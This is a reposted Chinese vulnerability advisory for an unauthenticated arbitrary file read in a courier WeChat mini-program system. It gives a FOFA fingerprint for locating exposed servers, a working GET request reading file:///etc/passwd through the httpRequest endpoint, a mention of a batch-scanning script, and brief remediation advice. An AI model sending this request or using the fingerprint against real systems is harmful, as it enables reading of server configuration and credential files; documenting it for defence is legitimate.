快递微信小程序系统 httpRequest 任意文件读取漏洞 PoC

admin 2024年11月8日15:35:57评论7 views字数 780阅读2分36秒阅读模式

0x02

产品介绍

快递微信小程序系统是基于微信平台开发的轻量级应用,用户无需下载额外的APP,即可在微信内直接使用小程序进行快递操作。该系统集成了多项功能,实现了从寄件下单、物流跟踪到支付结算等全链条的快递服务,极大地提高了用户的便捷性和使用体验。
0x03

漏洞威胁

快递微信小程序系统 httpRequest 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
0x04

漏洞环境

FOFA:

body="static/default/newwap/lang/js/jquery.localize.min.js"

快递微信小程序系统 httpRequest 任意文件读取漏洞 PoC

0x05

漏洞复现

PoC

GET /weixin/index/httpRequest?url=file:///etc/passwd HTTP/2Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, br, zstdConnection: keep-alive

快递微信小程序系统 httpRequest 任意文件读取漏洞 PoC

0x06

批量脚本验证

Nuclei验证脚本已发布
知识星球:冷漠安全

快递微信小程序系统 httpRequest 任意文件读取漏洞 PoC

0x07

修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

0x08

 

原文始发于微信公众号(冷漠安全):「漏洞复现」快递微信小程序系统 httpRequest 任意文件读取漏洞

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月8日15:35:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   快递微信小程序系统 httpRequest 任意文件读取漏洞 PoChttps://cn-sec.com/archives/3371325.html

发表评论

匿名网友 填写信息